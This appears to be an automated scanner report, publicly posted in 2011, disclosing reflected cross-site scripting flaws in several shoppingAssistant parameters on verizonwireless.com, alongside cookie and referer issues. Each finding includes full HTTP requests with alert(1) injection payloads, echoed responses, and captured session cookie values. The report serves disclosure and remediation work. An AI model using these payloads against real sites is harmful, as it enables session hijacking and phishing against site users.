XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, verizonwireless.com

Report generated by XSS.CX at Mon Jul 18 08:45:18 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://www.verizonwireless.com/b2c/shoppingAssistant [closeUrl parameter]

1.2. http://www.verizonwireless.com/b2c/shoppingAssistant [displayText parameter]

1.3. http://www.verizonwireless.com/b2c/shoppingAssistant [hasMultipleAssociatedSimTOs parameter]

1.4. http://www.verizonwireless.com/b2c/shoppingAssistant [name of an arbitrarily supplied request parameter]

1.5. http://www.verizonwireless.com/b2c/shoppingAssistant [phoneID parameter]

1.6. http://www.verizonwireless.com/b2c/shoppingAssistant [quantity parameter]

2. Cookie scoped to parent domain

3. Cross-domain Referer leakage

3.1. http://www.verizonwireless.com/b2c/dispatcher

3.2. http://www.verizonwireless.com/b2c/index.html

3.3. http://www.verizonwireless.com/b2c/shoppingAssistant

3.4. http://www.verizonwireless.com/b2c/store/controller

3.5. http://www.verizonwireless.com/b2c/store/controller

3.6. http://www.verizonwireless.com/b2c/store/controller

3.7. http://www.verizonwireless.com/b2c/store/controller

3.8. http://www.verizonwireless.com/b2c/store/controller

3.9. http://www.verizonwireless.com/b2c/store/controller

4. Cross-domain script include

4.1. http://www.verizonwireless.com/b2c/dispatcher

4.2. http://www.verizonwireless.com/b2c/explore/

4.3. http://www.verizonwireless.com/b2c/index.html

4.4. http://www.verizonwireless.com/b2c/shoppingAssistant

4.5. http://www.verizonwireless.com/b2c/store/controller

4.6. http://www.verizonwireless.com/b2c/store/controller

4.7. http://www.verizonwireless.com/b2c/store/controller

4.8. http://www.verizonwireless.com/b2c/store/controller

4.9. http://www.verizonwireless.com/b2c/storelocator/index.jsp

5. Cookie without HttpOnly flag set

6. HTML does not specify charset

7. Content type incorrectly stated

7.1. http://www.verizonwireless.com/b2c/devicesController/interface/dwrChangeTermService.js

7.2. http://www.verizonwireless.com/b2c/devicesController/interface/dwrCompareService.js

7.3. http://www.verizonwireless.com/b2c/devicesController/interface/dwrDeviceDetailTabService.js

7.4. http://www.verizonwireless.com/b2c/devicesController/interface/dwrSearchService.js

7.5. http://www.verizonwireless.com/b2c/devicesController/interface/dwrSupportTabService.js



1. Cross-site scripting (reflected)  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.verizonwireless.com/b2c/shoppingAssistant [closeUrl parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the closeUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ac2b'%3balert(1)//5aadb58b643 was submitted in the closeUrl parameter. This input was echoed as 5ac2b';alert(1)//5aadb58b643 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue5ac2b'%3balert(1)//5aadb58b643 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:03 GMT
Pragma: no-cache
Content-Length: 8020
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
window.location='/b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst'+'&displayText=Phone&closeUrl='+escape('/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&backTo=true5ac2b';alert(1)//5aadb58b643');
        } else if (data.nextStep == 'bogo'){
           
           window.location='/b2c/shoppingAssistant?step=bogo&item=phoneFirst&phoneID=5632';
               }
       }
       });
   
   
}
</sc
...[SNIP]...

1.2. http://www.verizonwireless.com/b2c/shoppingAssistant [displayText parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the displayText request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0b8a"-alert(1)-"52dbce692bd was submitted in the displayText parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phoned0b8a"-alert(1)-"52dbce692bd&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312206231|session#1310993870949-319721#1310998491|check#true#1310996691; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:05 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 15106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Main JSP for the new shopping Assistant -->


<html xmlns="http://www.w3.org/1
...[SNIP]...
<script type="text/javascript">
           addLoadEvent(setButtons);
           addLoadEvent(png_init);
           
           var currentSA="/b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phoned0b8a"-alert(1)-"52dbce692bd&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue";
           function continueToPlan() {
           
                    phoneFirst.continueToPlan('phoneFirst', funct
...[SNIP]...

1.3. http://www.verizonwireless.com/b2c/shoppingAssistant [hasMultipleAssociatedSimTOs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the hasMultipleAssociatedSimTOs request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 34aa8%3balert(1)//3e4ef288914 was submitted in the hasMultipleAssociatedSimTOs parameter. This input was echoed as 34aa8;alert(1)//3e4ef288914 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false34aa8%3balert(1)//3e4ef288914&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:03 GMT
Pragma: no-cache
Content-Length: 8019
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
<script type="text/javascript">
   function continueshopping() {

   
           phoneFirst.addPhone('phoneFirst',5632,1 ,false34aa8;alert(1)//3e4ef288914, function(data) {
       if(data.result){

           if(data.nextStep == 'serverError'){
               $('setError').set('html',data.errorMessage);
                   overlay.passFrameSize();
               document.locati
...[SNIP]...

1.4. http://www.verizonwireless.com/b2c/shoppingAssistant [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb600"-alert(1)-"8e3e52beae3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phone&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue&cb600"-alert(1)-"8e3e52beae3=1 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312206231|session#1310993870949-319721#1310998491|check#true#1310996691; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:10 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 15118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Main JSP for the new shopping Assistant -->


<html xmlns="http://www.w3.org/1
...[SNIP]...
       var currentSA="/b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phone&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue&cb600"-alert(1)-"8e3e52beae3=1";
           function continueToPlan() {
           
                    phoneFirst.continueToPlan('phoneFirst', function(data) {
            if(data.result){
            // alert("called");
               if(window.parent.location){

...[SNIP]...

1.5. http://www.verizonwireless.com/b2c/shoppingAssistant [phoneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the phoneID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c68ab%3balert(1)//0c4b84ca3ab was submitted in the phoneID parameter. This input was echoed as c68ab;alert(1)//0c4b84ca3ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632c68ab%3balert(1)//0c4b84ca3ab&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:02 GMT
Pragma: no-cache
Content-Length: 8100
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
<script type="text/javascript">
   function continueshopping() {

   
           phoneFirst.addPhone('phoneFirst',5632c68ab;alert(1)//0c4b84ca3ab,1 ,false, function(data) {
       if(data.result){

           if(data.nextStep == 'serverError'){
               $('setError').set('html',data.errorMessage);
                   overlay.passFrameSize();
               docume
...[SNIP]...

1.6. http://www.verizonwireless.com/b2c/shoppingAssistant [quantity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The value of the quantity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9f547%3balert(1)//4aa1c76251f was submitted in the quantity parameter. This input was echoed as 9f547;alert(1)//4aa1c76251f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=19f547%3balert(1)//4aa1c76251f&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204729|session#1310993870949-319721#1310996989|check#true#1310995189; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:44:02 GMT
Pragma: no-cache
Content-Length: 8019
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <title>Shopping Cart</title>
   

                   
...[SNIP]...
<script type="text/javascript">
   function continueshopping() {

   
           phoneFirst.addPhone('phoneFirst',5632,19f547;alert(1)//4aa1c76251f ,false, function(data) {
       if(data.result){

           if(data.nextStep == 'serverError'){
               $('setError').set('html',data.errorMessage);
                   overlay.passFrameSize();
               document
...[SNIP]...

2. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

POST /b2c/vzwfly HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?&item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312203471|check#true#1310993931|session#1310993870949-319721#1310995731; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

query=item%3DphoneFirst%26action%3DviewPhoneDetail%26selectedPhoneId%3D5635%26go%3D%2Fstore%2Fcontroller%26&fd=&go=%2Fstore%2Fcontroller&zipcode=10010&rememberMyZip=&state=&prevstate=&change=&filter=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Mon, 18 Jul 2011 13:01:19 GMT
Location: http://www.verizonwireless.com:80/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Set-Cookie: CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 18-Jul-2011 13:21:19 GMT; path=/
Set-Cookie: ZIPCODE=10010; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
Set-Cookie: CITY=New York; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
Set-Cookie: STATE=NY; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
